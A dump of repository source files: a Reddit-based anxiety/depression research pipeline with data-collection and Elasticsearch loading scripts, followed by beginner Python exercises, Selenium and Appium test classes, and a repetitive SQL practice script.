"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7822, "license_type": "no_license", "max_line_length": 129, "num_lines": 167, "path": "/preprocessingPipeline.py", "repo_name": "zsscode/DepressionResearch", "src_encoding": "UTF-8", "text": "import re\nimport pandas as pd\nimport numpy as np\nimport warnings\n\nwarnings.simplefilter(\"ignore\")\n\nfrom pipelineHelperFunctions import *\nfrom sklearn.svm import LinearSVC\nfrom sklearn.utils import shuffle\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split,cross_val_score\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\n\ndef DataFilter(i_DF):\n i_DF = shuffle(i_DF)\n encoder = LabelEncoder()\n i_DF['subreddit'] = encoder.fit_transform(i_DF['subreddit'])\n i_DF['post_text'] = i_DF['post_text'].fillna('')\n i_DF = i_DF[i_DF['post_text'] != '[removed]']\n i_DF = i_DF[i_DF['title_length'] >= 20]\n i_DF = i_DF.dropna()\n return i_DF\n\ndef FilterWholeData(io_PartialData, io_WholeData):\n svc, count_vect = TitleClassifier(io_PartialData)\n io_WholeData = CleanData(io_WholeData)\n io_WholeData['predicted'] = svc.predict(count_vect.transform(io_WholeData['title']))\n # Filter out the data by noise\n # Subreddits with less than 50 appearences are dropped out\n counts = io_WholeData['subreddit'].value_counts()\n popular_subreddits = counts[counts.values >= 50].keys()\n io_WholeData = io_WholeData[(io_WholeData['subreddit'].isin(popular_subreddits))]\n\n return io_WholeData\n\n\n\ndef Pipeline():\n\n df = pd.read_csv(r'/home/ohad/Desktop/Studies/Year3/Project/Updated_Data/anxietyTemp.csv')\n df = DataFilter(df)\n\n whole_data = pd.read_csv(r'/home/ohad/Desktop/Studies/Year3/Project/Updated_Data/SubmissionsDF.csv', index_col=0)\n whole_data = FilterWholeData(df, whole_data)\n\n\n # Number of UNIQUE subreddits left after being filtered\n subreddits = set(whole_data['subreddit'])\n len(subreddits)\n\n neutral_subreddits, anxiety_subreddits = GetNeutralAndDepressionSubreddits(whole_data, subreddits)\n\n print(\"The Filtered Neutral Subreddits Are:\\n\\n\", neutral_subreddits)\n print(20 * \"-\")\n print(\"The Filtered Anxiety Subreddits are:\\n\\n\", anxiety_subreddits)\n\n anxiety_subreddit_filtered_list = ['Anxiety']\n\n # Split the dataframe to neutral and depressed by the filtered subreddits\n depression_df = whole_data[whole_data['subreddit'].isin(anxiety_subreddit_filtered_list)]\n neutral_df = whole_data[whole_data['subreddit'].isin(neutral_subreddits)]\n\n print(\"Anxiety group size:\\n\\n\", depression_df.shape)\n print(20 * \"-\")\n print(\"neutral group size:\\n\\n\", neutral_df.shape)\n\n # Get the list of all unique users for each type of dataset\n depression_names = list(set(depression_df['user_name']))\n neutral_names = list(set(neutral_df['user_name']))\n\n # Merge them back to a single dataframe\n full_df = pd.concat([depression_df, neutral_df], axis=0)\n full_df.shape\n\n # Filter out people who havn't posted in both types of subreddits (Depression/Neutral) in the current dataset\n both = []\n for i in depression_names:\n if i in neutral_names:\n both.append(i)\n print(\"Amount of unique users who are in both groups: \", len(both))\n\n anxietyGroupSize = 0\n neutralGroupSize = 0\n for user in depression_names:\n anxietyGroupSize += whole_data[whole_data['user_name'] == user].shape[0]\n\n for user in neutral_names:\n neutralGroupSize += whole_data[whole_data['user_name'] == 
user].shape[0]\n\n print(\"Posts taken from anxious users: \", anxietyGroupSize)\n print(20 * \"-\")\n print(\"Posts taken from neutral users: \", neutralGroupSize)\n\n full_df = full_df[full_df['user_name'].isin(both)]\n full_df = full_df.sort_values(by=['user_name', 'date_created'], ascending=False)\n full_df['num_distinct_words'] = full_df['post_text'].apply(lambda x: len(set(x.split())))\n\n post = GetRegularExpressions(full_df)\n\n # Find out how many unique users we found who match our regular expressions - by submission id\n # this is done to get only their depression related posts and not their entire posts\n # Later on, we'll take the rest of their post and categorize them as neutral based\n # this will be our compare group\n users_filtered_by_re = list(set(post))\n len(list(set(post)))\n\n # Get all the unique users found in the previous step\n filtered_by_re = full_df[full_df['submission_id'].isin(users_filtered_by_re)].copy()\n\n # Take n largest subreddit by appreance in the filtered dataset\n n_largest = list(filtered_by_re['subreddit'].value_counts().nlargest(7).keys())\n\n print(filtered_by_re['subreddit'].value_counts())\n\n # Create the final depressed testing group to be compared with neutral people\n # by taking the depressed test group user id's, we can create the group's neutral posts\n depressed_group_depressed_posts = filtered_by_re[filtered_by_re['subreddit'].isin(n_largest)]\n depression_group_users = list(set(depressed_group_depressed_posts['user_name']))\n depression_group_users_indices = list(set(depressed_group_depressed_posts['user_name'].index))\n\n # Create a list of all the possible neutral predicted posts which contain our regular expression\n temp_list = list(\n depressed_group_depressed_posts[depressed_group_depressed_posts['predicted'] == 1]['submission_id'].index)\n\n # First, create the dataset comprised of the same users we have in our depression dataset\n # Second, take only the neutral related posts of these users\n # Third, drop out the posts which were filtered by the regular expression and are now considered depression wise\n # Fourth, Filter out empty posts and keep only the ones above 50 words, this leaves us with an almost similar in size dataset\n depression_group_users_neutral_posts = full_df[full_df['user_name'].isin(depression_group_users)]\n depression_group_users_neutral_posts = depression_group_users_neutral_posts[\n depression_group_users_neutral_posts['predicted'] == 1]\n depression_group_users_neutral_posts = depression_group_users_neutral_posts.drop(temp_list, axis=0)\n depression_group_users_neutral_posts = depression_group_users_neutral_posts[\n depression_group_users_neutral_posts['num_words_post'] > 50]\n\n # Create a dataset comprised of all the other users who weren't classified as depressed by our regular expression\n # next, we only want those who we classified by our original classifier, who were predicted as neutral => predicted = 0\n non_depressed_people = full_df.drop(depression_group_users_indices, axis=0).copy()\n non_depressed_people = non_depressed_people[non_depressed_people['predicted'] == 1]\n non_depressed_people = non_depressed_people[non_depressed_people['num_words_post'] > 50]\n non_depressed_people.shape\n\n print(non_depressed_people.head())\n\n depression_group_users_neutral_posts = depression_group_users_neutral_posts.reset_index().drop('index', axis=1)\n neutral_total_subreddits = set(depression_group_users_neutral_posts['subreddit'].value_counts().keys())\n\n filtered_neutral_subreddits = 
list(set(n_largest) ^ neutral_total_subreddits)\n\n depression_group_users_neutral_posts = depression_group_users_neutral_posts[\n depression_group_users_neutral_posts['subreddit'].isin(filtered_neutral_subreddits)]\n depression_group_users_neutral_posts.shape\n\n # Print how many unique users we have for each group:\n print(\"Number of Unique depressed posts users:\", len(list(set(depressed_group_depressed_posts['user_name']))))\n print(\"Number of Unique depressed neutral posts users:\",\n len(list(set(depression_group_users_neutral_posts['user_name']))))\n print(\"Number of Unique neutral posts users\", len(list(set(non_depressed_people['user_name']))))\n\n print(\"Number of depression Neutral posts: \", depression_group_users_neutral_posts.shape)\n\n depression_group_users_neutral_posts.to_csv('neutralPosts.csv')\n\n\nPipeline()" }, { "alpha_fraction": 0.5639835000038147, "alphanum_fraction": 0.5699174404144287, "avg_line_length": 39.375, "blob_id": "74fc4dac8dc4e48a59baf5e827dd9a47e8211f50", "content_id": "9de92b12e3d04f44da35c1e6332c5ea01e8c018d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3876, "license_type": "no_license", "max_line_length": 128, "num_lines": 96, "path": "/Create_Data/createMoreData.py", "repo_name": "zsscode/DepressionResearch", "src_encoding": "UTF-8", "text": "import Create_Data.UtilFunctions as utils\nimport pandas as pd\n\n# Changed from a recursive function to an infinite loop.\n# thus, no extra memory required.\n#\nindex = 'reddit'\ndoc_type = 'submission'\nes = utils.Elasticsearch(\"http://localhost:9200\")\nif es.indices.exists(index=index):\n index_counter = es.count(index=index)\nelse:\n es.indices.create(index=index, ignore=400)\n index_counter = es.count(index=index)\n\nwhile True:\n\n reddit = utils.connectToAPI()\n new_subreddit = utils.getNewSubreddit(reddit, 20)\n submissionDF = utils.loadData()\n print(\"Current DataFrame Shape:{}\".format(submissionDF.shape))\n\n unique_names = utils.getNames(submissionDF, new_subreddit)\n print(\"Number of new users:{}\".format(len(unique_names)))\n\n if len(unique_names) == 0:\n print(\"Going to sleep\")\n # utils.sleep(60 * 20)\n print(\"Waking up\")\n pass # clear - works\n else:\n\n topics_dict = {\n \"submission_id\": [],\n \"title\": [],\n \"score\": [],\n \"num_comments\": [],\n \"title_length\": [],\n \"subreddit\": [],\n \"post_text\": [],\n \"comment_karma\": [],\n \"link_karma\": [],\n \"upvote_ratio\": [],\n \"date_created\": [],\n \"user_name\": [],\n \"appearance\": [],\n \"text_changed\": [],\n }\n\n\n print(\"Entering Part 1\\n\")\n for curr_id in unique_names:\n print(curr_id)\n try:\n for submission in reddit.redditor(str(curr_id)).submissions.new():\n userName = str(submission.author)\n topics_dict['submission_id'].append(submission.id)\n topics_dict['title'].append(submission.title)\n topics_dict['score'].append(submission.score)\n topics_dict['num_comments'].append(submission.num_comments)\n topics_dict['title_length'].append(len(submission.title))\n topics_dict['subreddit'].append(submission.subreddit)\n topics_dict['post_text'].append(submission.selftext)\n topics_dict['link_karma'].append(reddit.redditor(userName).link_karma)\n topics_dict['upvote_ratio'].append(submission.upvote_ratio)\n topics_dict['date_created'].append(submission.created_utc)\n topics_dict['user_name'].append(submission.author)\n topics_dict['comment_karma'].append(reddit.redditor(userName).comment_karma)\n topics_dict['appearance'].append(0)\n 
topics_dict['text_changed'].append(0)\n\n except Exception as e:\n print(\"Error occured with id:{}\".format(str(curr_id)))\n print(e)\n pass\n\n topics_dict = utils.pd.DataFrame(data=topics_dict)\n\n print(\"Entering Part 2\")\n topics_dict = topics_dict[['submission_id', 'title', 'score', 'num_comments',\n 'title_length', 'subreddit', 'post_text', 'comment_karma',\n 'link_karma', 'upvote_ratio', 'date_created', 'user_name', 'appearance', 'text_changed']]\n topics_dict = utils.createMoreFeatures(topics_dict)\n\n print(\"Loading to Elasticsearch\")\n topics_dict.to_csv('temp_json.csv',index=False)\n topics_dict = pd.read_csv('temp_json.csv')\n topics_dict.to_json('temp_json.json', orient='index')\n\n utils.init_elastic(index=index, doc_type=doc_type, elastic_address=\"http://localhost:9200\", index_counter=index_counter)\n index_counter = es.count(index=index)\n print(\"Saving\")\n topics_dict = utils.pd.concat([topics_dict, submissionDF], sort=False)\n topics_dict = topics_dict.fillna('')\n\n topics_dict.to_csv('SubmissionsDF2.csv', index=False)\n" }, { "alpha_fraction": 0.7154929637908936, "alphanum_fraction": 0.7253521084785461, "avg_line_length": 27.31999969482422, "blob_id": "c12b36f774137c4881c6445a8f3921f7cff98104", "content_id": "32d6a0b3661c26d899d3f54e062e28860a01aa67", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 710, "license_type": "no_license", "max_line_length": 102, "num_lines": 25, "path": "/Create_Data/bulk_load_elastic.py", "repo_name": "zsscode/DepressionResearch", "src_encoding": "UTF-8", "text": "import json\nimport pandas as pd\nfrom elasticsearch import Elasticsearch\n\n\ndata = pd.read_csv(r'C:\\Users\\Gilad\\PycharmProjects\\DepressionResearch\\Create_Data\\SubmissionsDF.csv')\ndata.to_json('bulk_load.json', orient='index')\n\njson_data = open('bulk_load.json').read()\ndata = json.loads(json_data)\n\nes = Elasticsearch(\"http://localhost:9200\")\nindex = 'reddit'\ndoc_type = 'submission'\n\nif es.indices.exists(index=index):\n index_counter = es.count(index=index)\nelse:\n es.indices.create(index=index, ignore=400)\n index_counter = es.count(index=index)\n\ncount = index_counter['count']\n\nfor ind in range(count, len(data)):\n es.index(index=index, doc_type=doc_type, id=ind, body=list(data.values())[ind])\n\n\n" } ]
4
AnastasyaEremenko1906/Plotly_Nastya
https://github.com/AnastasyaEremenko1906/Plotly_Nastya
bd60c3f15823e7334c75bf766b9cbb91797b4924
87611c2b5eb8cfd54479efbb914b45b789abf6b7
546df42e818f763cdde1ad13841c06d756a05d8b
refs/heads/main
2023-08-15T16:20:02.487429
2021-10-14T12:46:05
2021-10-14T12:46:05
416,764,420
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.685479998588562, "alphanum_fraction": 0.6997105479240417, "avg_line_length": 47.20930099487305, "blob_id": "5a7c2f5f1367e1a8db293b3caf742ebb201479ae", "content_id": "8ed75b20f55b5429356cdf4c7e9198ae3eb63ab2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4771, "license_type": "no_license", "max_line_length": 143, "num_lines": 86, "path": "/for_fix.py", "repo_name": "AnastasyaEremenko1906/Plotly_Nastya", "src_encoding": "UTF-8", "text": "import psycopg2\nimport streamlit as st\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport plotly.graph_objects as go\nfrom PIL import Image\nimport datetime\nfrom dateutil import relativedelta\nfrom datetime import date\n\n\n# 1. Считываю исходный df\n\ndf = pd.read_excel(\"https://github.com/AnastasyaEremenko1906/Plotly_Nastya/blob/6aa8fa2c071cd9900b4347df1ff6c56cd428d553/output.xlsx?raw=True\")\ndf['volume'] = df['volume'].astype('int')\n# 2. Перевожу даты в дататайп, считаю длит-ть перекачки + смотрю, была ли перекачка в одном и том же месяце\n\nadding_columns = df.copy()\nadding_columns[\"start_pump\"] = pd.to_datetime(adding_columns[\"start_pump\"])\nadding_columns[\"end_pump\"] = pd.to_datetime(adding_columns[\"end_pump\"])\nadding_columns['pump_days'] = adding_columns.apply(\n lambda row: relativedelta.relativedelta(row['end_pump'], row['start_pump']).days, axis=1)\nadding_columns['pump_days'] = adding_columns['pump_days'] + 1\nadding_columns['delta_month'] = adding_columns['end_pump'].dt.month - adding_columns['start_pump'].dt.month\n# 3. Создаю 2 датафрейма:где перекачка велась в одном и том же месяце (df_month_true) и в разных\n\ndf_month_false = adding_columns[adding_columns['delta_month'] == 1]\ndf_month_true = adding_columns[adding_columns['delta_month'] == 0]\n# 3.1 Создаю две копии, работаю с НЕСОВПАДАЮЩИМИ месяцами (delta_month = 1)\n\ntable_same = df_month_true.copy()\ntable_not_same = df_month_false.copy()\n# 3.2 Добавляю 2 столбца: сколько дней качали в первом месяце (starting_day) и сколько во втором (ending_day)\n\ntable_not_same['ending_day'] = table_not_same['end_pump'].dt.day\ntable_not_same['starting_day'] = table_not_same['pump_days'] - table_not_same['ending_day']\n# 3.3 Добавляю 2 столбца: сколько газа качали в первом месяце (starting_day) и сколько во втором (ending_day)\ntable_not_same['volume_end'] = table_not_same['volume'] * table_not_same['ending_day'] / table_not_same['pump_days']\ntable_not_same['volume_start'] = table_not_same['volume'] * table_not_same['starting_day'] / table_not_same['pump_days']\ntable_not_same = table_not_same.astype({'volume_end': 'int', 'volume_start': 'int'})\n# 3.4 Создаю df, где провожу группировку по месяцам\n\ndf_not_same = table_not_same.copy()\ndf_not_same['start_pump'] = df_not_same['start_pump'].dt.month\ndf_not_same['end_pump'] = df_not_same['end_pump'].dt.month\n\ndf_not_same_start = df_not_same.groupby('start_pump', as_index=False) \\\n .agg({'volume_start': 'sum'}) \\\n .rename(columns={\"start_pump\": \"month_number\", \"volume_start\": \"volume\"})\ndf_not_same_finish = df_not_same.groupby('end_pump', as_index=False) \\\n .agg({'volume_end': 'sum'}) \\\n .rename(columns={\"end_pump\": \"month_number\", \"volume_end\": \"volume\"})\n# 3.5 Создаю итоговый df для перекачек, идущих в нескольких месяцах\n\ndf_not_same_union = pd.merge(df_not_same_finish, df_not_same_start, how=\"outer\") \\\n .groupby(\"month_number\", as_index=False) \\\n .agg({\"volume\": \"sum\"})\n# 4 
Работаю с СОВПАДАЮЩИМИ месяцами\n\ndf_same_union = table_same.copy()\ndf_same_union['start_pump'] = df_same_union['start_pump'].dt.month\ndf_same_union = df_same_union.groupby(\"start_pump\", as_index=False) \\\n .agg({\"volume\": \"sum\"}) \\\n .rename(columns={\"start_pump\": \"month_number\"})\n# 5.1 Свожу всё в один df. На выходе объем перекачек по месяцам\n\ndf_total = pd.merge(df_not_same_union, df_same_union, how=\"outer\") \\\n .groupby(\"month_number\", as_index=False) \\\n .agg({\"volume\": \"sum\"}) \\\n .sort_values([\"month_number\"]) \\\n .astype({'month_number': 'str'})\n# 5.2 Делаю свою сортировку, сортирую по месяцам\n\nmonth_id = [str(i) for i in range(1, 13)]\nsorter = ['Январь', 'Февраль', 'Март', 'Апрель', 'Май', 'Июнь', 'Июль', 'Август', 'Сентябрь', 'Октябрь', 'Ноябрь',\n 'Декабрь']\nindex_to_month = {index: month for index, month in zip(month_id, sorter)}\nmonth_literals = [index_to_month[i] for i in index_to_month]\ndf_total['month_number'] = df_total['month_number'].replace(index_to_month)\n# 6 Строю графики\nfig = go.Figure(\n data=[go.Bar(x=df_total['month_number'], y=df_total['volume'])],\n layout_title_text=\"Распределение объёма по месяцам\"\n)\nst.plotly_chart(fig)\n" } ]
1
surbbahl/sdet
https://github.com/surbbahl/sdet
98ae582fa0824dba579a2d172b629a4acb8f71e2
fc4967cef22e3924b282a7b285382bc53eb64002
bc1b4c32faecd2d12a01a398a37a32eab81a5cdd
refs/heads/main
2023-06-18T04:00:01.716720
2021-07-16T15:26:07
2021-07-16T15:26:07
317,445,538
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5491803288459778, "alphanum_fraction": 0.5573770403862, "avg_line_length": 27.75, "blob_id": "521845c7eb949369960f93b5a68fca35b9a5cef3", "content_id": "854eccf82c239ebdee2cb7c573e43dfd46e47dd7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 244, "license_type": "no_license", "max_line_length": 39, "num_lines": 8, "path": "/odd_even.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "K=input(\"DO you wnat to enter numnerY\")\r\nwhile (K!='N'):\r\n Number=input(\"Enter the number\")\r\n if int(Number)%2==0:\r\n print(\"Number is even\")\r\n else:\r\n print(\"Number is odd\")\r\n K=input(\"Do you want to comtinue\")\r\n \r\n" }, { "alpha_fraction": 0.6988833546638489, "alphanum_fraction": 0.7104350924491882, "avg_line_length": 46.092594146728516, "blob_id": "a21faca55a18ece538bdde4b7e65be06012aea97", "content_id": "9f2df1b09930c13882cab06fc3b4e3d8975472a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2597, "license_type": "no_license", "max_line_length": 169, "num_lines": 54, "path": "/Project_5.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "import static org.testng.Assert.assertEquals;\r\n\r\nimport java.io.IOException;\r\nimport java.net.MalformedURLException;\r\nimport java.net.URL;\r\nimport java.util.List;\r\nimport java.util.concurrent.TimeUnit;\r\n\r\nimport org.openqa.selenium.remote.DesiredCapabilities;\r\nimport org.openqa.selenium.remote.RemoteWebElement;\r\nimport org.openqa.selenium.support.ui.WebDriverWait;\r\nimport org.testng.Assert;\r\nimport org.testng.annotations.AfterTest;\r\nimport org.testng.annotations.BeforeTest;\r\nimport org.testng.annotations.Test;\r\n\r\nimport io.appium.java_client.AppiumDriver;\r\nimport io.appium.java_client.MobileBy;\r\nimport io.appium.java_client.MobileElement;\r\nimport io.appium.java_client.android.*;\r\npublic class Project_5 {\r\n\t@Test\r\n\tpublic void project_5() throws InterruptedException,IOException\r\n\r\n\t{\r\n\t\t\r\n\t\t\tWebDriverWait wait;\r\n\t\t\tDesiredCapabilities cap=new DesiredCapabilities();\r\n\t\t\tcap.setCapability(\"devicename\", \"Pixel 4_surbhi\");\r\n\t\t\tcap.setCapability(\"platformName\", \"Android\");\r\n\t cap.setCapability(\"appPackage\", \"com.android.chrome\");\r\n\t cap.setCapability(\"appActivity\", \"com.google.android.apps.chrome.Main\");\r\n\t cap.setCapability(\"noReset\", true);\r\n\t AppiumDriver<MobileElement> driver=null;\r\n\t driver=new AndroidDriver<MobileElement>(new URL(\"http://127.0.0.1:4723/wd/hub\"), cap);\r\n\t wait = new WebDriverWait(driver, 10);\r\n\t driver.manage().timeouts().implicitlyWait(30,TimeUnit.SECONDS);\r\n\t //driver.findElementById(\"terms_accept\").click();\r\n\t driver.get(\"https://www.training-support.net/selenium\");\r\n\t driver.findElementByXPath(\"//android.view.View/android.view.View[1]/android.view.View[1]/android.widget.Button\").click();\r\n\t \r\n\t driver.findElementByXPath(\"//android.view.View[3]/android.view.View/android.widget.EditText[1]\").sendKeys(\"admin\");\r\n\t driver.findElementByXPath(\"//android.view.View/android.view.View[3]/android.view.View/android.widget.EditText[2]\").sendKeys(\"password\");\r\n\t driver.findElementByXPath(\"//android.view.View/android.view.View[3]/android.view.View/android.widget.Button\").click();\r\n\t List<MobileElement> st 
=driver.findElementsByXPath(\"//android.webkit.WebView/android.view.View/android.view.View[1]/android.view.View[2]/android.view.View[3]\");\r\n\t String s=st.get(0).getText();\r\n\t System.out.println(s);\r\n\t String E=\"You tried to login using invalid credentials. Please try again.\";\r\n\t assertEquals(s,E);\r\n\t //android.view.View/android.view.View[3]/android.view.View/android.widget.EditText[2]\r\n\t \r\n\t}\r\n\t\r\n}\r\n" }, { "alpha_fraction": 0.7333333492279053, "alphanum_fraction": 0.7333333492279053, "avg_line_length": 30, "blob_id": "3323088e450c13305f944381f58bb6f9e99a36c1", "content_id": "ce4bebc5566ac70db3468d339d74c4e90d3f17db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30, "license_type": "no_license", "max_line_length": 30, "num_lines": 1, "path": "/Multiplication.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "num=int(input(\"Enter number\"))" }, { "alpha_fraction": 0.7206704020500183, "alphanum_fraction": 0.7243947982788086, "avg_line_length": 36.35714340209961, "blob_id": "a5123210e9d70df1250d40a5a9e3e89ba94b9b5a", "content_id": "2ade245c2be350941f01b5d018bfd5c589698eff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1074, "license_type": "no_license", "max_line_length": 79, "num_lines": 28, "path": "/Class_2.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Selenium_activity2;\r\n\r\nimport org.openqa.selenium.By;\r\nimport org.openqa.selenium.WebDriver;\r\nimport org.openqa.selenium.WebElement;\r\nimport org.openqa.selenium.firefox.FirefoxDriver;\r\npublic class Class_2 {\r\n\tpublic static void main (String[] args)\r\n\t{\r\n\t\tWebDriver driver =new FirefoxDriver();\r\n\t\tdriver.get(\"https://www.training-support.net\");\r\n\t\tString title=driver.getTitle();\r\n\t\tSystem.out.println(\"Title os the page is \"+title);\r\n\t\tWebElement idLocator=driver.findElement(By.id(\"about-link\"));\r\n\t\tSystem.out.println(\"Text in element by id \"+idLocator.getText());\r\n\t\tWebElement Classnameloca= driver.findElement(By.className(\"green\"));\r\n\t\tSystem.out.println(\"Text in element by class name \"+Classnameloca.getText());\r\n\t\t\r\n\t\tWebElement csslocator=driver.findElement(By.cssSelector(\".green\"));\r\n\t\tSystem.out.println(\"Text in element by cs selector \"+csslocator.getText());\r\n\t\t\r\n\t\tWebElement linktext1=driver.findElement(By.linkText(\"About Us\"));\r\n\t System.out.println(\"Text in element by link text \"+linktext1.getText());\r\n\t driver.close();\r\n\t\t\r\n\t}\r\n\r\n}\r\n" }, { "alpha_fraction": 0.3575129508972168, "alphanum_fraction": 0.4922279715538025, "avg_line_length": 16.899999618530273, "blob_id": "844fde3e3f196278fb5c7dbd9e2c4b8502690079", "content_id": "28d6e002803c8bcd3ebc9070ec5c2fae0c7967bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 193, "license_type": "no_license", "max_line_length": 23, "num_lines": 10, "path": "/combininglist.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "list1=[1,3,4,5,6,8,9]\r\nlist2=[2,6,8,7,0,5,1]\r\nlist3=[]\r\nfor i in list1:\r\n if(i%2!=0):\r\n list3.append(i)\r\nfor j in list2:\r\n if(j%2==0):\r\n list3.append(j)\r\nprint (list3)\r\n " }, { "alpha_fraction": 0.29646018147468567, "alphanum_fraction": 0.3185840845108032, "avg_line_length": 11.625, "blob_id": "7cd86ce06422cd93ea4c5ded2cb8be174cf2503f", "content_id": 
"6a582a85855c69307f183427394bd914add9ef60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 226, "license_type": "no_license", "max_line_length": 22, "num_lines": 16, "path": "/fab.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "def fab(N):\r\n a=1\r\n b=1\r\n i=0\r\n print(str(a))\r\n print(str(b))\r\n while (i<N):\r\n c=a+b\r\n print(str(c))\r\n a=b\r\n b=c\r\n \r\n i=i+1\r\n\r\nres=fab(6)\r\nprint (res)\r\n " }, { "alpha_fraction": 0.6327376961708069, "alphanum_fraction": 0.7161774039268494, "avg_line_length": 22.82889747619629, "blob_id": "cb6131608dcb4397c656ffa11d93f7024156c6fe", "content_id": "9aeaea6e2b75d2e5b160fd4d3440ccacbc559592", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 6268, "license_type": "no_license", "max_line_length": 59, "num_lines": 263, "path": "/sqlscript (1).sql", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "REM Script: SQL_activity1\nREM SQL activity1\n\ncreate table salesman( \nSalesman_id number;\n\nSalesman_name varchar2(32); \n\n\nSalesman_city varchar2(32); \n\n\ncommission Number; \n\n\n)\n\n\ncreate table salesman( \nSalesman_id number, \nSalesman_name varchar2(32), \nSalesman_city varchar2(32), \ncommission Number \n);\n\ncreate table salesman( \nSalesman_id number, \nSalesman_name varchar2(32), \nSalesman_city varchar2(32), \ncommission Number \n);\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\ninsert ALL \ninto salesman values (5005,'PA','London',11) \ninto salesamn values(5006,'Mclyon', 'Paris',14) \ninto salesman values (5007,'PaulAdam','Rome',13) \ninto salesman values(5003,'Lauson Hen','SanJose',12);\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\ninsert ALL \ninto salesman values (5005,'PA','London',11) \ninto salesamn values(5006,'Mclyon', 'Paris',14) \ninto salesman values (5007,'PaulAdam','Rome',13) \ninto salesman values(5003,'Lauson Hen','SanJose',12) \nSelect 1 from Dual;\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\ninsert ALL \ninto salesman values (5005,'PA','London',11) \ninto salesamn values(5006,'Mclyon', 'Paris',14) \ninto salesman values (5007,'PaulAdam','Rome',13) \ninto salesman values(5003,'Lauson Hen','SanJose',12) \nSelect 1 from Dual;\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\ninsert ALL \ninto salesman values (5005,'PA','London',11) \ninto salesamn values(5006,'Mclyon', 'Paris',14) \ninto salesman values (5007,'PaulAdam','Rome',13) \ninto salesman values(5003,'Lauson Hen','SanJose',12) \nSelect 1 from DUAL;\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\ninsert ALL \ninto salesman values (5005,'PA','London',11) \ninto salesamn values(5006,'Mclyon', 'Paris',14) \ninto salesman values (5007,'PaulAdam','Rome',13) \ninto salesman values(5003,'Lauson Hen','SanJose',12) \n \nSelect 1 from DUAL;\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\ninsert ALL \ninto salesman values (5005,'PA','London',11) \ninto salesamn values(5006,'Mclyon', 'Paris',14) \ninto salesman values (5007,'PaulAdam','Rome',13) \ninto salesman values(5003,'Lauson Hen','SanJose',12) \n \nSelect 1 from DUAL;\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\ninsert ALL \ninto salesman values 
(5005,'PA','London',11) \ninto salesamn values(5006,'Mclyon', 'Paris',14) \ninto salesman values (5007,'PaulAdam','Rome',13) \ninto salesman values(5003,'Lauson Hen','SanJose',12) \n \nSelect 1 from DUAL;\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\ninsert ALL \ninto salesman values (5005,'PA','London',11) \ninto salesamn values(5006,'Mclyon', 'Paris',14) \ninto salesman values (5007,'PaulAdam','Rome',13) \ninto salesman values(5003,'Lauson Hen','SanJose',12) \n \nSelect 1 from DUAL;\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\ninsert ALL \ninto salesman values (5005,'PA','London',11) \ninto salesamn values(5006,'Mclyon', 'Paris',14) \ninto salesman values (5007,'PaulAdam','Rome',13) \ninto salesman values(5003,'Lauson Hen','SanJose',12) \n \nSelect 1 from DUAL;\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\nInsert ALL \ninto salesman values (5005,'PA','London',11) \ninto salesamn values(5006,'Mclyon', 'Paris',14) \ninto salesman values (5007,'PaulAdam','Rome',13) \ninto salesman values(5003,'Lauson Hen','SanJose',12) \n \nSelect 1 from DUAL;\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\nInsert ALL \n into salesman values (5005,'PA','London',11) \n into salesamn values(5006,'Mclyon', 'Paris',14) \n into salesman values (5007,'PaulAdam','Rome',13) \n into salesman values(5003,'Lauson Hen','SanJose',12) \n \nSelect 1 from DUAL;\n\nInsert ALL \n into salesman values (5005,'PA','London',11) \n into salesamn values(5006,'Mclyon', 'Paris',14) \n into salesman values (5007,'PaulAdam','Rome',13) \n into salesman values(5003,'Lauson Hen','SanJose',12) \n \nSelect 1 from DUAL;\n\ninsert into salesman values(5002,'NailKnite','Paris',13);\n\ninsert into salesman values(5002,'NailKnite','Paris',13);\n\ninsert into salesman values(5005,'BB','London',14);\n\ninsert into salesman values(5006,'CC','US',16);\n\ninsert into salesman values(5007,'DD','UK',17);\n\nINSERT ALL \ninto salesman values(5002,'NailKnite','Paris',13);\n\ninto salesman values(5005,'BB','London',14); \n\n\ninto salesman values(5006,'CC','US',16); \n\n\ninto salesman values(5007,'DD','UK',17);\n\n\nINSERT ALL \ninto salesman values(5002,'NailKnite','Paris',13) \ninto salesman 